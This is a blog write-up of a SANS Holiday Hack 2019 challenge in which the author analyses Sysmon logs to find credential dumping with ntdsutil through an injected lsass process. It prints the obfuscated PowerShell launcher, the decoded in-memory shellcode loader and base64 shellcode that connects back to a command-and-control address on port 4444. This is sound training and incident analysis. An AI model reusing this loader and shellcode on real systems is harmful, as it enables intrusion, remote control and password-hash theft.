Monday, January 27, 2020

SANS Holiday Hack 2019 - Objective 4: Windows Log Analysis: Determine Attack Technique

Objective 4:  Windows Log Analysis:  Determine Attack Technique

The hints for this challenge are given by SugarPlum Mary in the Hermey Hall (Go to the left side of the quad.)  For this one, it gives a link to a file that must be downloaded and examined: https://downloads.elfu.org/sysmon-data.json.zip.  SugarPlum Mary’s hint leads to this page:  https://www.endgame.com/our-experts/ross-wolf (Please click on the images below if they don't seem large enough to read.)



The hints for this challenge are given by SugarPlum Mary in the Hermey Hall (Go to the left side of the quad.)  The hint links are: https://pen-testing.sans.org/blog/2019/12/10/eql-threat-hunting/ and https://www.darkoperator.com/blog/2014/8/8/sysinternals-sysmon



I downloaded the Slingshot VM from here:  https://www.sans.org/slingshot-vmware-linux/download#, as described in this article:  https://pen-testing.sans.org/blog/2019/12/10/eql-threat-hunting/, because it already has the tool installed.  If you decide to download the Slingshot VM, you will have to login to SANS.org with your SANS creds.  This VM is in ova format, so it can be opened in a variety of virtualization software.  I used Workstation Pro simply because I’m familiar with it and it’s cousin VMWare Fusion.  In this software, an ova must be imported.   The version I’m using, you simply double click on the downloaded Slingshot image, and it starts the import process.  Name the VM, choose somewhere to store it and click Import.  The virtualization does the work for you.  Once it’s loaded and displayed, login to the VM with the creds slingshot, slingshot.  Slingshot is a version of Linux, so you may want to read about the Linux OS to use it.


Interestingly, the answer to this challenge is in the article here:  https://pen-testing.sans.org/blog/2019/12/10/eql-threat-hunting/, so people could have guessed the answer.  Many attacks use living off the land as an attack technique.  That means that they use tools natively installed on the OS to avoid detection.  In this case, it was ntdsutil.  This natively installed utility can be used to make a backup of the password hashes.


If you search through the logs, some interesting things can be found.  A good place to start seemed to be what they were asking for.  Try to find lsass.exe.  sql query -f sysmon-data.json “process where process_name = ‘lsass.exe’”  Unfortunately, this doesn’t return any results.  Why?  That's because in this case, it's a parent process to cmd.exe.  sql query -f sysmon-data.json “process where parent_process_name = ‘lsass.exe’” reveals this.  Why on Earth would cmd.exe be being ran out of a parent process of lsass.exe?  The Objective question kind of answers it.  Something was injected into the lsass.exe process, causing its evil business to appear to be carried out by lsass.exe.  What was injected into lsass.exe?  Follow the process IDs to answer the Objective.  The pid of this cmd.exe process with the parent process of lsass.exe is 3440.  So, look for this pid being used as a parent process of another process to answer the Objective question.  See, it’s ntdsutil.




For more fun, find out what was injected into lsass.exe.  Many modern attacks are performed with powershell.exe because it’s natively installed on Windows 7+ and very powerful.  So, look for the powershell.exe process instead of lsass.exe, and you’ll see a strange looking memory resident, base64 encoded, compressed powershell payload.  This is commonly done to bypass AV.  You can tell it’s encoded because it contains base64, and compressed because it contains gzip.  The string with green text is the base64 encoded/gzip compressed stream.

"C:\\Windows\\system32\\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b=‘powershell.exe’}else{$b=$env:windir+’\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object.System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(‘’H4sIAKne010CA7VWbW/aSBD+nEj5D1aFhK0QjANtmkiVbs2bITiBGMxb0Wljr83C2gZ7DZhe//uNAaepmt61J52Vl/XuzOzMM8/M2Il9i9PAF2JdaQhfLs7PujjEniDmaOVDQcjtzYRz6ewMDnKb7W74KHwSxClarWqBh6k/u7urxmFIfH58LzYJR1FEvGdGSSRKwlCcE5CcvX4vCAWF74IuT+LTRY8Y3YSS6rYmhPhCvl2etYJLJz6UzRWjHIx//lzXppeKbNifR1jFol5I4k48Yo2Y3lJ+CqlF/aTFRHzOrXCIAocXhxSv3xdHPgRdsgDWNsQnfB5YEd5CcKAn5DwOPSFY0CpheO5mIdlNwwsZNshiaJ8QZimtqez2R/i9HTxU+xz6pFiy+ckDFYGCTfUIlFRw77NyBNxZqBl8JD67kySQGwTLImY82PGCsLvmBEfyDaD7VeVxNdKINXloVSAXL4VqB7YMSNH1fwbnqYEkOB5IQGA9/Xi/OLcySjjd25fMwZWZ9PDmoB7YjeI6EHsk1AqCDrcg3kQJvCa64cxkWYv4Aq5Zd2ghZ/rK5kwiHqm/ecA9qZmQO0Z6Jxymks26e7PmVkjDvVJLfGxR62MfOJbKBOHkUOExUzsAXwS86cDYtcIIy7mKWxpsn9Qq3uUv+iqMWU2CZEFmYrAK0ii9L0zx0yI+ZavEw8gOr4D+3IOUJ5k0ieaJ9nt6TsI5asMR1FB6MZQc1ZBMAhmxC4IyI/o6QjFPDgs89/c1WPGqYUjnpmbSUcUT7dVAz/iYWxBziDyvrEiFsUsBaIgaNQmamJQN7s1/yYMVcwYlAFY2kAaYCcN3+ApE0Jw8JB1qWgQ3vJWjHggcyj9BsMuFPqJ7AfqYJfY+e/9y5h8pG2KQwbAK+8guQYLeEEwacihf6SYHgj0325/1TrAj2pITlkQs9KYqglPGZ2zrZSMJ0gOAIQcgm+EgafiiHyoHDuE+E5+pFUEz7jlM91Sl1RBW6q0dPgd0HIrqN3Y9+2FJoe13dxBraila91aT9Mqm7ZhVrhRb/H7bovr9dFiYSDtaTDmkxbS+rS0HFf2qzbdGx1kj3fyh72635bU3X7h2s645jjujWM8Ke8btDOs9tTSNe7U6nFnqG7VUiWq063Wo4Pest3gz2OT4YEjuyPlFtNdJ1yYSqDvWwg152Vr33bM5ly3k7FGyUIudWgP9RC6t54Gg6a7cpsRkm/NddVboHUDI4xaqG4m7fdM7Q0aKhrU1R5+DLrly5qsTOx1vTEZ4bbH7KYmK+MRslEo9925cvM491OcsKuu1VQGdSZJQwaZbgVplWu6n6x7TRfVQcb0AoQbdDm4HIHNhz7oDAeKHSDut0aybLqyixxjPsZIBWl1jRpqUE0+dvWubJrXc+V5qczBZzLafNTb6LJhdWVZvvSe4a+MLH2180fq9mbjakZwj++xuZmUZaW/bTpojS4vVUV95lq93N7AvX35dvDpXcodIE8uqHmvaPGzbq7jMJpjBnSBLp1VZyMIG6e+2w1oqiGKh5G9JKFPGMw7mIgZzRFjgZU2/rRDw8w5ToJ0MA1gWb5+cyUJL4LSt3GQbd3dTcBJKBvbKnaI7/J5obQrl0rQ2ku7Sgki/PWwqsEqEcFQIR0MKShHs+xgVkrrKMe0yej/hepUvXP4Z/8LVN/2/uH0l+ArFQ7h/rD7/cZvgfnbgQ8x5SBpQPth5Dj53oz/xIpXXwZpUiDrzulJP+4eY371AB8MF+d/A60hbvxJCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"

You can decode and decompress the payload to see what it's trying to run in memory.  A really useful tool is CyberChef.  Simply navigate to https://gchq.github.io/CyberChef/, search for From Base64 Click on it to add it to the recipe, then search for Gunzip, and click on it to add it to the recipe, then add the payload to the input area.  Once it’s added, you’ll see the payload that the Powershell payload up above is running from a stream in memory.  It's a Powershell script running in memory.  Powersheption.


Here is the fully decode/gunzipped script.  Googling the base64 payload in this script reveals this article:  https://medium.com/@tstillz17/analyzing-obfuscated-powershell-with-shellcode-1b6cb8ab5ab0.  The article shows how to decode the next base64 payload, which is actually shell code.  Googling the shell code shows that it’s a Powershell Empire C&C that was injected into the lsass.exe process.

Function a2T {
    Param ($ic6T, $ylqn)
    $cL = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object {$_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')

return $cL.GetMethod('GetProcAddress',[Type[]]@([System.Runtime.InteropServices.HandleRef],[String])).Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object
System.Runtime.InteropServices.HandleRef((New-Object IntPtr),($cL.GetMethod('GetModuleHandle')).Invoke($null, @($ic6T)))), $ylqn))
}

function iq {
Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $jd,
        [Parameter(Position = 1)] [Type] $v2a = [Void]
)

$mSSG = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule',$false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$mSSG.DefineConstructor('RTSpecialName, HideBySig, Public’, [System.Reflection.CallingConventions]::Standard, $jd).SetImplementationFlags('Runtime, Managed')
$mSSG.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $v2a, $jd).SetImplementationFlags('Runtime, Managed')
return $mSSG.CreateType()
}

[Byte[]]$s2Tyx =
[System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdyYHiej/0LiQAQAAKcRUUGgpgGsA/9VqCmjAqFaAaAIAEVyJ5lBQUFBAUEBQaOoP3+D/1ZdqEFZXaJmldGH/1YXAdAr/Tgh17OhnAAAAagBqBFZXaALZyF//1YP4AH42izZqQGgAEAAAVmoAaFikU+X/1ZNTagBWU1doAtnIX//Vg/gAfShYaABAAABqAFBoCy8PMP/VV2h1bk1h/9VeXv8MJA+FcP///+mb////AcMpxnXBw7vgHSoKaKaVvZ3/1TwGfAqA++B1BbtHE3JvagBT/9U=")

$coU = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((a2T kernel32.dll VirtualAlloc), (iq @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $s2Tyx.Length,0x3000,0x40)

[System.Runtime.InteropServices.Marshal]::Copy($s2Tyx, 0, $coU, $s2Tyx.length)

$fM51S = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((a2T kernel32.dll CreateThread), (iq @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr])
([IntPtr]))).Invoke([IntPtr]::Zero,0,$coU,[IntPtr]::Zero,0,[IntPtr]::Zero)

[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((a2T kernel32.dll WaitForSingleObject), (iq @([IntPtr], [Int32]))).Invoke($fM51S,0xffffffff) | Out-Null


The following is the Empire C&C payload taken from the decoded payload above.

[Byte[]]$s2Tyx =
[System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdyYHiej/0LiQAQAAKcRUUGgpgGsA/9VqCmjAqFaAaAIAEVyJ5lBQUFBAUEBQaOoP3+D/1ZdqEFZXaJmldGH/1YXAdAr/Tgh17OhnAAAAagBqBFZXaALZyF//1YP4AH42izZqQGgAEAAAVmoAaFikU+X/1ZNTagBWU1doAtnIX//Vg/gAfShYaABAAABqAFBoCy8PMP/VV2h1bk1h/9VeXv8MJA+FcP///+mb////AcMpxnXBw7vgHSoKaKaVvZ3/1TwGfAqA++B1BbtHE3JvagBT/9U=")


The following image shows the decoded shell code in hex. 




If you run the shell code like the person describes in the article, https://medium.com/@tstillz17/analyzing-obfuscated-powershell-with-shellcode-1b6cb8ab5ab0, with scdbg, you find that the C&C IP is 192.168.86.128 and the port is 4444.
It’s an internal IP.  So maybe someone should check and see if that IP is compromised or one that shouldn't be on the network.



 

No comments:

Post a Comment